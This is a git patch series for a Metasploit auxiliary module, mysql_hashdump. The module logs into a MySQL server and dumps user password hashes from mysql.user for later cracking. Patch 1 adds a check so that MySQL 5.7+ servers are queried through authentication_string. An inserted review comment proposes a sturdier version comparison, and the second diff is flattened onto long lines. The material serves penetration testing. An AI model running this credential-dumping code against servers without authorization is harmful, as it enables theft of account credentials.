From 00ead052370fd5cc3b210548ba00769c3fe676a7 Mon Sep 17 00:00:00 2001
From: Osanda Malith Jayathissa
Date: Thu, 8 Feb 2018 13:40:35 +0000
Subject: [PATCH 1/2] Update for MySQL 5.7 and above

Starting from MySQL 5.7 the password column was changed to authentication_string. I've added a check to determine the version. Tested on both MySQL 5.6 and 5.7.
---
 modules/auxiliary/scanner/mysql/mysql_hashdump.rb | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)

diff --git a/modules/auxiliary/scanner/mysql/mysql_hashdump.rb b/modules/auxiliary/scanner/mysql/mysql_hashdump.rb
index 65fb904c6d..c6fb668626 100644
--- a/modules/auxiliary/scanner/mysql/mysql_hashdump.rb
+++ b/modules/auxiliary/scanner/mysql/mysql_hashdump.rb
@@ -57,7 +57,12 @@ class MetasploitModule < Msf::Auxiliary
 create_credential_login(login_data)
 
 #Grabs the username and password hashes and stores them as loot
- res = mysql_query("SELECT user,password from mysql.user")
+ version = mysql_get_variable("@@version")
+ if (5.6 < version[0..2].to_f)
+ res = mysql_query("SELECT user,authentication_string from mysql.user")
+ else
+ res = mysql_query("SELECT user,password from mysql.user")
+ end
 if res.nil?
 print_error("There was an error reading the MySQL User Table")
 return

From 1bb5499fceab9722aff853e1e77dad79d9a09496 Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Thu, 8 Feb 2018 13:48:24 -0600
Subject: [PATCH 2/2] fix whitespace

---
 .../auxiliary/scanner/mysql/mysql_hashdump.rb | 112 +++++++++---------
 1 file changed, 54 insertions(+), 58 deletions(-)

diff --git a/modules/auxiliary/scanner/mysql/mysql_hashdump.rb b/modules/auxiliary/scanner/mysql/mysql_hashdump.rb
index c6fb668626..f1adde3fe7 100644
--- a/modules/auxiliary/scanner/mysql/mysql_hashdump.rb
+++ b/modules/auxiliary/scanner/mysql/mysql_hashdump.rb
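Review bot: `version` is dereferenced without a nil check in the added lines — `mysql_get_variable("@@version")` presumably fails the same way the hunk already anticipates for `res`, so a server that does not answer the variable lookup raises NoMethodError on `version[0..2]` instead of reaching the existing print_error path. The three-character slice is also fragile: a version string with a two-digit major (a constructed `10.1.2` slices to `10.`) compares above 5.6 and selects `authentication_string` regardless of whether that server's column layout matches, which may be the case for forks that report such versions. Guarding the nil and comparing the leading dotted number group with `Gem::Version` keeps the intent of the switch while removing both edge cases. The same slice comparison is carried unchanged into the second patch's `@@ -77,10 +34,54 @@` hunk. run_host continues on both sides of this hunk.
```ruby
# … unchanged: credential/login bookkeeping above …
# Grab the username and password hashes and store them as loot
version = mysql_get_variable("@@version")
if version.nil?
  print_error("There was an error reading the MySQL server version")
  return
end
# Starting from MySQL 5.7 the hash is stored in authentication_string; compare the
# leading dotted number group so a two-digit major is ordered correctly.
numeric = version[/\A\d+(\.\d+)*/] || '0'
column = Gem::Version.new(numeric) >= Gem::Version.new('5.7') ? 'authentication_string' : 'password'
res = mysql_query("SELECT user,#{column} from mysql.user")
# … unchanged: res.nil? check and loot handling …
```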
@@ -12,10 +12,10 @@ class MetasploitModule < Msf::Auxiliary def initialize super( 'Name' => 'MYSQL Password Hashdump', - 'Description' => %Q{ + 'Description' => %( This module extracts the usernames and encrypted password hashes from a MySQL server and stores them for later cracking. - }, + ), 'Author' => ['theLightCosine'], 'License' => MSF_LICENSE ) @@ -23,53 +23,10 @@ class MetasploitModule < Msf::Auxiliary def run_host(ip) - if (not mysql_login_datastore) - return - end + return unless mysql_login_datastore service_data = { - address: ip, - port: rport, - service_name: 'mysql', - protocol: 'tcp', - workspace_id: myworkspace_id - } - - credential_data = { - module_fullname: self.fullname, - origin_type: :service, - private_data: datastore['PASSWORD'], - private_type: :password, - username: datastore['USERNAME'] - } - - credential_data.merge!(service_data) - - credential_core = create_credential(credential_data) - - login_data = { - core: credential_core, - last_attempted_at: DateTime.now, - status: Metasploit::Model::Login::Status::SUCCESSFUL - } - login_data.merge!(service_data) - - create_credential_login(login_data) - - #Grabs the username and password hashes and stores them as loot - version = mysql_get_variable("@@version") - if (5.6 < version[0..2].to_f) - res = mysql_query("SELECT user,authentication_string from mysql.user") - else - res = mysql_query("SELECT user,password from mysql.user") - end - if res.nil? - print_error("There was an error reading the MySQL User Table") - return - end - - service_data = { - address: ::Rex::Socket.getaddress(rhost,true), + address: ip, port: rport, service_name: 'mysql', protocol: 'tcp', 
@@ -77,10 +34,54 @@ class MetasploitModule < Msf::Auxiliary } credential_data = { - origin_type: :service, - jtr_format: 'mysql,mysql-sha1', - module_fullname: self.fullname, - private_type: :nonreplayable_hash + module_fullname: self.fullname, + origin_type: :service, + private_data: datastore['PASSWORD'], + private_type: :password, + username: datastore['USERNAME'] + } + + credential_data.merge!(service_data) + + credential_core = create_credential(credential_data) + + login_data = { + core: credential_core, + last_attempted_at: DateTime.now, + status: Metasploit::Model::Login::Status::SUCCESSFUL + } + login_data.merge!(service_data) + + create_credential_login(login_data) + + # Grab the username and password hashes and store them as loot + version = mysql_get_variable("@@version") + + # Starting from MySQL 5.7, the 'password' column was changed to 'authentication_string'. + if version[0..2].to_f > 5.6 + res = mysql_query("SELECT user,authentication_string from mysql.user") + else + res = mysql_query("SELECT user,password from mysql.user") + end + + if res.nil? + print_error("There was an error reading the MySQL User Table") + return + end + + service_data = { + address: ::Rex::Socket.getaddress(rhost, true), + port: rport, + service_name: 'mysql', + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + origin_type: :service, + jtr_format: 'mysql,mysql-sha1', + module_fullname: self.fullname, + private_type: :nonreplayable_hash } credential_data.merge!(service_data) @@ -92,17 +93,12 @@ class MetasploitModule < Msf::Auxiliary print_good("Saving HashString as Loot: #{row[0]}:#{row[1]}") credential_core = create_credential(credential_data) login_data = { - core: credential_core, - status: Metasploit::Model::Login::Status::UNTRIED + core: credential_core, + status: Metasploit::Model::Login::Status::UNTRIED } login_data.merge!(service_data) create_credential_login(login_data) end end - end - - - - end